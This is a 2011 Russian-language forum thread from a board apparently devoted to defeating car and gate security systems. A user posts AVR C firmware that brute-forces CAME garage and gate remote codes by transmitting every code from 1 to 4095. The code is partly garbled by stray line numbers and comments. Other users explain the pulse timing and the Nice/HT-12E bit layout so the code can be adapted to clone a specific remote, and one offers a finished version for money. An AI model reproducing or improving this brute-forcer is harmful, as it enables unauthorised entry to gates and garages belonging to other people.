Изучение уязвимостей электронных систем.
 
key programming immo tools emergency start device программаторы ключа заводилки Кодграббер штатных охранных систем, toyota, lexus, subaru.

Вернуться   Изучение уязвимостей электронных систем > Для начинающих > Новички

Новички Раздел для новичков. Что такое кодграббер, ретранслятор, подмена кода.

Ответ
 
Опции темы
Старый 04.08.2011, 10:59   #11
Кинг
случайно влез
 
Регистрация: 06.11.2010
Сообщений: 44
Поблагодарил: 0
Поблагодарили 0 раз в 0 сообщениях
Кинг стоит на развилке
По умолчанию

вот нашел брут для came. только немогу понять где выставляется длина 0 и 1. исправьте если что нетак
#define F_CPU=1200000UL

#include <avr/io.h>
#include <util/delay.h>

#define RT PB3
#define RT_HI PORTB|=(1<<RT)
#define RT_LO PORTB&=~(1<<RT)

#define LED PB1
#define LED_ON PORTB|=(1<<LED)
#define LED_OFF PORTB&=~(1<<LED)

#define BUTTON PB0
#define BUTTON_STATE !(PINB&(1<<BUTTON))
/параметры выдаваемого сигнала. макс. код, число одинаковых кодов в выбросе,
2 //пауза между кодами, и TE - равное одной трети длины бита.
3 #define CODE_MAX 4095 \\ это ненадо
4 #define CODE_COUNT 4
5 #define DELAY 16 //ms
6 #define TE 320 //us
7
8 //функция для выброса кода в формате CAME. Код в функцию передается параметром code.
9 //принцип работы стандартный - перебор битов в цикле через наложение битовой маски,
10 //и выброс нужного бита.
11 void came_send(unsigned int code) \\ цикл перебора по маске тоже ненадо
12 {
13 unsigned int mask=0b0001000000000000;
14
15 while(mask)
16 {
17 _delay_us(TE);
18 if(mask&code) RT_HI;
19 _delay_us(TE);
20 RT_HI;
21 _delay_us(TE);
22 RT_LO;
23
24 mask>>=1;
25 }
26 }
27 void blink()
{
LED_ON;
_delay_ms(100);
LED_OFF;
_delay_ms(100);
}
28 int main(void)
29 {
30 //конфигурируем порты МК
31 DDRB=(1<<RT)|(1<<LED);
32 PORTB=(1<<BUTTON);
33
34 //мигнем 3 раза после включения
35 blink();
36 blink();
37 blink();
38
39 unsigned char a;
40 unsigned int code;
41
42 //главный цикл
43 while(1)
44 {
45 //если нажата кнопка
46 if(BUTTON_STATE)
47 {
48 blink();
49
50 //начинаем перебор кодов от 1 до CODE_MAX \\это тоже ненадо
51 for(code=1; code<=CODE_MAX; code++)
52 {
53 //пока кнопка нажата - стоим на паузе.
54 while(BUTTON_STATE);
55
56 //выбрасываем код CODE_COUNT раз
57 for(a=0; a<CODE_COUNT; a++) \\ тут должен писаться 13битный код
58 {
59 came_send(code);
60 _delay_ms(DELAY);
61 }
62
63 //каждые 32 кода будем мигать светодиодом, чтобы было понятно, что процесс идет.
64 if(!(code%32)) \\это ненадо
65 {
66 LED_ON;
67 _delay_ms(50);
68 LED_OFF;
69 }
70 }
71
72 //после полного перебора мигаем несколько раз и переходим в начальное состояние.
73 for(a=0; a<8; a++) blink();
74 }
75 }
76
77 return 0;
78 }
Кинг вне форума   Ответить с цитированием
Старый 04.08.2011, 13:03   #12
huy
участник
 
Аватар для huy
 
Регистрация: 17.03.2010
Адрес: Космас
Сообщений: 360
Поблагодарил: 1
Поблагодарили 103 раз в 53 сообщениях
huy стоит на развилке
По умолчанию

\\ цикл перебора по маске тоже ненадо
- наркоман штоле ?

длина задается
#define TE 320 //us
huy вне форума   Ответить с цитированием
Старый 04.08.2011, 13:33   #13
Кинг
случайно влез
 
Регистрация: 06.11.2010
Сообщений: 44
Поблагодарил: 0
Поблагодарили 0 раз в 0 сообщениях
Кинг стоит на развилке
По умолчанию

у брелка nice 10 переключателей. я списал их расположение вверх-1 вниз-0. 0100101000.как мне этот код запихнуть в прошивку? TE будет равно 700мкC. Данные представляют собой 10 бит кода. 2 бита кнопки(это непонимаю).

Последний раз редактировалось Кинг; 04.08.2011 в 14:13.
Кинг вне форума   Ответить с цитированием
Старый 04.08.2011, 14:01   #14
CodePerfect
начинающий фрикер
 
Аватар для CodePerfect
 
Регистрация: 10.05.2009
Сообщений: 594
Поблагодарил: 76
Поблагодарили 204 раз в 116 сообщениях
CodePerfect стоит на развилке
По умолчанию

Найди даташит на микросхему HOLTEK HT-12E. Если ты собирешься делать клон конкретного пульта, то положение переключателей нужно поместить в прошивку. Если девайс будет читать код с эфира, а потом передавать его, то выключатели тебя не интересуют.


Солдатами не рождаются, солдатами умирают.
CodePerfect вне форума   Ответить с цитированием
Старый 04.08.2011, 14:28   #15
Кинг
случайно влез
 
Регистрация: 06.11.2010
Сообщений: 44
Поблагодарил: 0
Поблагодарили 0 раз в 0 сообщениях
Кинг стоит на развилке
По умолчанию

непонимаю ключ 13бит. первый бит 0. потом 10бит ключ. а остальные 2 бита куда?
Кинг вне форума   Ответить с цитированием
Старый 04.08.2011, 15:52   #16
tahion
начинающий фрикер
 
Регистрация: 15.06.2009
Сообщений: 624
Поблагодарил: 14
Поблагодарили 540 раз в 127 сообщениях
tahion скоро станет знаменитым(-ой)
По умолчанию

Цитата:
Сообщение от Кинг Посмотреть сообщение
а остальные 2 бита куда?

это кнопко, когда нажата там 1, когда не нажата там 0. кнопко в кол-ве 2 шт.
tahion вне форума   Ответить с цитированием
Старый 04.08.2011, 17:04   #17
Кинг
случайно влез
 
Регистрация: 06.11.2010
Сообщений: 44
Поблагодарил: 0
Поблагодарили 0 раз в 0 сообщениях
Кинг стоит на развилке
По умолчанию

помогите мне переделать программу у меня ниче не получается
Кинг вне форума   Ответить с цитированием
Старый 04.08.2011, 17:12   #18
tahion
начинающий фрикер
 
Регистрация: 15.06.2009
Сообщений: 624
Поблагодарил: 14
Поблагодарили 540 раз в 127 сообщениях
tahion скоро станет знаменитым(-ой)
По умолчанию

Кинг, и ничего не получится пока не приложишь усилия что бы разобраться. А вместо исходников лучше найди осциллограммы Came/Nice, они есть на форуме, и посмотри как выгледят эти 1+12 бит в эфире, что такое длительности импульсов, как формируется сигнал и т.п.
Эта информация открытая, поэтому не надо говорить, что я ничего не понимаю. Готовое решение тебе никто не даст, так что прилагай усилия, разбирайся, и хотя бы задавай "правильные" вопросы.
tahion вне форума   Ответить с цитированием
Старый 04.08.2011, 17:26   #19
gorlofu
случайно влез
 
Регистрация: 08.07.2010
Сообщений: 37
Поблагодарил: 6
Поблагодарили 2 раз в 2 сообщениях
gorlofu стоит на развилке
По умолчанию

могу дать готовое решение-всего 10к рублей!
gorlofu вне форума   Ответить с цитированием
Старый 04.08.2011, 17:32   #20
tahion
начинающий фрикер
 
Регистрация: 15.06.2009
Сообщений: 624
Поблагодарил: 14
Поблагодарили 540 раз в 127 сообщениях
tahion скоро станет знаменитым(-ой)
По умолчанию

gorlofu, будь я модератором отправил бы тебя в бан ))
tahion вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Универсальные открывашки Doorhan, CAME, NICE, Hormann, ... heisenberg Коммерческие объявления. 1099 Сегодня 01:50
nice flor-s sergio777 Охранные системы 8 23.06.2015 11:27
Приемник для Nice Static alexiop Новички 2 16.12.2010 18:52
Универсальный ключ гаражных ворот Nice Zews Black list 13 19.03.2010 11:52


Текущее время: 03:43. Часовой пояс GMT +4.


Перевод: zCarot